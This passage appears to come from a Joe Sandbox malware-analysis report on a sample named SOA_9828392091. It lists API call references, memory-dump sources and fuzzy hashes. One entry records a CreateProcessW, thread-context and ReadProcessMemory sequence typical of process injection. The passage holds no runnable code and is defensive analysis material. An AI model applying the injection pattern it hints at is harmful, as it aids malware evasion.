                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: e99f54a83759205bb0dc008deab831daf3afc12e8663e72724506813ed36de7a
                                      • Instruction ID: 1234db47a0272e7f198a56b91bd2c2286b61f5ad23c58b7aeae43eab2f875881
                                      • Opcode Fuzzy Hash: e99f54a83759205bb0dc008deab831daf3afc12e8663e72724506813ed36de7a
                                      • Instruction Fuzzy Hash: 77F148716083019FCB10EF28C891B5AB7E5BFC8314F14896EF9999B392D735E905CB82
                                      APIs
                                      • __FF_MSGBANNER.LIBCMT ref: 00953973
                                        • Part of subcall function 009581C2: __NMSG_WRITE.LIBCMT ref: 009581E9
                                        • Part of subcall function 009581C2: __NMSG_WRITE.LIBCMT ref: 009581F3
                                      • __NMSG_WRITE.LIBCMT ref: 0095397A
                                        • Part of subcall function 0095821F: GetModuleFileNameW.KERNEL32(00000000,009F0312,00000104,00000000,00000001,00000000), ref: 009582B1
                                        • Part of subcall function 0095821F: ___crtMessageBoxW.LIBCMT ref: 0095835F
                                        • Part of subcall function 00951145: ___crtCorExitProcess.LIBCMT ref: 0095114B
                                        • Part of subcall function 00951145: ExitProcess.KERNEL32 ref: 00951154
                                        • Part of subcall function 00957C0E: __getptd_noexit.LIBCMT ref: 00957C0E
                                      • RtlAllocateHeap.NTDLL(01630000,00000000,00000001), ref: 0095399F
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                      • String ID:
                                      • API String ID: 1372826849-0
                                      • Opcode ID: 34b89e81e03f79322a954f944bb058b5e1dbef437b9163566e65f41a20e8425f
                                      • Instruction ID: d1b201a85d80edcf6c1b054e276bf68b4826e6546ddc9f6f8657c506d1ef559e
                                      • Opcode Fuzzy Hash: 34b89e81e03f79322a954f944bb058b5e1dbef437b9163566e65f41a20e8425f
                                      • Instruction Fuzzy Hash: 2001D672249601DAE611FB67EC62B2E634C9BC27A2F204025FD01DB292DBF49D4887A0
                                      APIs
                                      • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,0097C385,?,?,?,?,?,00000004), ref: 0097C6F2
                                      • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,0097C385,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 0097C708
                                      • CloseHandle.KERNEL32(00000000,?,0097C385,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 0097C70F
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: File$CloseCreateHandleTime
                                      • String ID:
                                      • API String ID: 3397143404-0
                                      • Opcode ID: dd28be3d33cc38335ea0689d142c2e8b7dea7b75f6e3ccfc57786cc606e9411b
                                      • Instruction ID: 1bb4f8f993cf4dba614cf616f32b2778946fbdbbe469e0719ba83ffbba884082
                                      • Opcode Fuzzy Hash: dd28be3d33cc38335ea0689d142c2e8b7dea7b75f6e3ccfc57786cc606e9411b
                                      • Instruction Fuzzy Hash: 70E08632145214B7D7251B58AC09FCE7B58AB05B70F144210FB14790E1A7B125119798
                                      APIs
                                      • _free.LIBCMT ref: 0097BB72
                                        • Part of subcall function 00951C9D: RtlFreeHeap.NTDLL(00000000,00000000,?,00957A85), ref: 00951CB1
                                        • Part of subcall function 00951C9D: GetLastError.KERNEL32(00000000,?,00957A85), ref: 00951CC3
                                      • _free.LIBCMT ref: 0097BB83
                                      • _free.LIBCMT ref: 0097BB95
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: _free$ErrorFreeHeapLast
                                      • String ID:
                                      • API String ID: 776569668-0
                                      • Opcode ID: 20f76424029b3f4f106c4d8a086868d24a1af312dab904e69dcb584714f23b8e
                                      • Instruction ID: 76d196db597997ce6e124c081c85d2fe8ff94d8cea242e1c99b2d7317564c937
                                      • Opcode Fuzzy Hash: 20f76424029b3f4f106c4d8a086868d24a1af312dab904e69dcb584714f23b8e
                                      • Instruction Fuzzy Hash: E7E012A664174186DA24A57AAE48FB313CC4F85352714081EBC9DE7146CF24F84486A8
                                      APIs
                                        • Part of subcall function 009322A4: RegisterClipboardFormatW.USER32(WM_GETCONTROLNAME), ref: 00932303
                                      • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 009325A1
                                      • CoInitialize.OLE32(00000000), ref: 00932618
                                      • CloseHandle.KERNEL32(00000000), ref: 009A503A
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: Handle$ClipboardCloseFormatInitializeRegister
                                      • String ID:
                                      • API String ID: 458326420-0
                                      • Opcode ID: 5b453c955799e081302fd8c84cfd22b7ba56df1abd7ad4729b53657d402d6c2a
                                      • Instruction ID: 628ce7e41afee68e762eaee0b3efc0855e6a60b23d9e033004214d0f0f4d84f1
                                      • Opcode Fuzzy Hash: 5b453c955799e081302fd8c84cfd22b7ba56df1abd7ad4729b53657d402d6c2a
                                      • Instruction Fuzzy Hash: 9B71B1B4929385CBC714DF9BA9915B5BBE4FBA8358790422EE12AC7371CB714400EFD4
                                      APIs
                                      • _memset.LIBCMT ref: 009A3725
                                        • Part of subcall function 0093660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,009353B1,?,?,009361FF,?,00000000,00000001,00000000), ref: 0093662F
                                        • Part of subcall function 009340A7: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 009340C6
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: NamePath$FullLong_memset
                                      • String ID: X
                                      • API String ID: 3051022977-3081909835
                                      • Opcode ID: 6060d1d0b4d173f882a1ddc58ac315bc7bb2a861d4e82d5f9e1c784dd8511f7c
                                      • Instruction ID: 7f63cb0a4f62ea6948550803620a0354996435cef9581429d373dd8810173cb9
                                      • Opcode Fuzzy Hash: 6060d1d0b4d173f882a1ddc58ac315bc7bb2a861d4e82d5f9e1c784dd8511f7c
                                      • Instruction Fuzzy Hash: 5321B771A14298AFCF11DFD4D845BEEBBFC9F89304F008059E505E7241DBB46A898FA5
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: __fread_nolock
                                      • String ID: EA06
                                      • API String ID: 2638373210-3962188686
                                      • Opcode ID: f3f9e3635da37ef7c752760c42503ac58e08c7a9769bdfba63715dd31bf1594b
                                      • Instruction ID: e84c354462d33eb994152e67cf304325293a198320747f37ec8646a1591e97c0
                                      • Opcode Fuzzy Hash: f3f9e3635da37ef7c752760c42503ac58e08c7a9769bdfba63715dd31bf1594b
                                      • Instruction Fuzzy Hash: 19012872904218BEDB29C7A9CC16FFEBBF89B05301F00855AF593D2181E5B8E7088B60
                                      APIs
                                      • 74A3C8D0.UXTHEME ref: 00933A73
                                        • Part of subcall function 00951405: __lock.LIBCMT ref: 0095140B
                                        • Part of subcall function 00933ADB: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00933AF3
                                        • Part of subcall function 00933ADB: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00933B08
                                        • Part of subcall function 00933D19: GetCurrentDirectoryW.KERNEL32(00007FFF,?,00000000,00000001,?,?,00933AA3,?), ref: 00933D45
                                        • Part of subcall function 00933D19: IsDebuggerPresent.KERNEL32(?,?,?,?,00933AA3,?), ref: 00933D57
                                        • Part of subcall function 00933D19: GetFullPathNameW.KERNEL32(00007FFF,?,?,009F1148,009F1130,?,?,?,?,00933AA3,?), ref: 00933DC8
                                        • Part of subcall function 00933D19: SetCurrentDirectoryW.KERNEL32(?,?,?,00933AA3,?), ref: 00933E48
                                      • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00933AB3
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: InfoParametersSystem$CurrentDirectory$DebuggerFullNamePathPresent__lock
                                      • String ID:
                                      • API String ID: 3809921791-0
                                      • Opcode ID: 243b86d41ab6af1268a19567031a52e94f45041d4606673a9d129eb8e29457d2
                                      • Instruction ID: 7414c80b4d32a4bf4069599662622d11ba6ffe9adb5f7f61945c5944e3924d66
                                      • Opcode Fuzzy Hash: 243b86d41ab6af1268a19567031a52e94f45041d4606673a9d129eb8e29457d2
                                      • Instruction Fuzzy Hash: 08116A7191C3419BC300EF6AE845A2ABBE8EBD4710F00891EF485872A1DB709584DF92
                                      APIs
                                      • ___lock_fhandle.LIBCMT ref: 0095EA29
                                      • __close_nolock.LIBCMT ref: 0095EA42
                                        • Part of subcall function 00957BDA: __getptd_noexit.LIBCMT ref: 00957BDA
                                        • Part of subcall function 00957C0E: __getptd_noexit.LIBCMT ref: 00957C0E
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: __getptd_noexit$___lock_fhandle__close_nolock
                                      • String ID:
                                      • API String ID: 1046115767-0
                                      • Opcode ID: ecf5a1728edaf070cb6aea6ed1b418fa5573b15f18d8693f0b2ddff4273d3f18
                                      • Instruction ID: 7448f9f9ff59d9e643c4813f1c5861c394e67d21e49fb52901edf056e7b3af09
                                      • Opcode Fuzzy Hash: ecf5a1728edaf070cb6aea6ed1b418fa5573b15f18d8693f0b2ddff4273d3f18
                                      • Instruction Fuzzy Hash: 6B1173728096508AE716FFB6D8413587A616FC2333F264740EC605B2E3C7B58E4897A5
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: __lock_file_memset
                                      • String ID:
                                      • API String ID: 26237723-0
                                      APIs
                                        • Part of subcall function 00957C0E: __getptd_noexit.LIBCMT ref: 00957C0E
                                      • __lock_file.LIBCMT ref: 00953629
                                        • Part of subcall function 00954E1C: __lock.LIBCMT ref: 00954E3F
                                      • __fclose_nolock.LIBCMT ref: 00953634
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                      • String ID:
                                      • API String ID: 2800547568-0
                                      APIs
                                      • CreateProcessW.KERNELBASE(?,00000000), ref: 018B8F55
                                      • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 018B8F79
                                      • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 018B8F9B
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125350713.00000000018B7000.00000040.00000020.00020000.00000000.sdmp, Offset: 018B7000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_18b7000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: Process$ContextCreateMemoryReadThreadWow64
                                      • String ID:
                                      • API String ID: 2438371351-0
                                      APIs
                                      • __flush.LIBCMT ref: 00952A0B
                                        • Part of subcall function 00957C0E: __getptd_noexit.LIBCMT ref: 00957C0E
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: __flush__getptd_noexit
                                      • String ID:
                                      • API String ID: 4101623367-0
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: ProtectVirtual
                                      • String ID:
                                      • API String ID: 544645111-0
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: ClearVariant
                                      • String ID:
                                      • API String ID: 1473721057-0
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: __getptd_noexit
                                      • String ID:
                                      • API String ID: 3074181302-0
                                      APIs
                                        • Part of subcall function 00934214: FreeLibrary.KERNEL32(00000000,?), ref: 00934247
                                      • LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,009339FE,?,00000001), ref: 009341DB
                                        • Part of subcall function 00934291: FreeLibrary.KERNEL32(00000000), ref: 009342C4
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: Library$Free$Load
                                      • String ID:
                                      • API String ID: 2391024519-0
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: ClearVariant
                                      • String ID:
                                      • API String ID: 1473721057-0
                                      APIs
                                      • ___lock_fhandle.LIBCMT ref: 0095AFC0
                                        • Part of subcall function 00957BDA: __getptd_noexit.LIBCMT ref: 00957BDA
                                        • Part of subcall function 00957C0E: __getptd_noexit.LIBCMT ref: 00957C0E
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: __getptd_noexit$___lock_fhandle
                                      • String ID:
                                      • API String ID: 1144279405-0
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: LibraryLoad
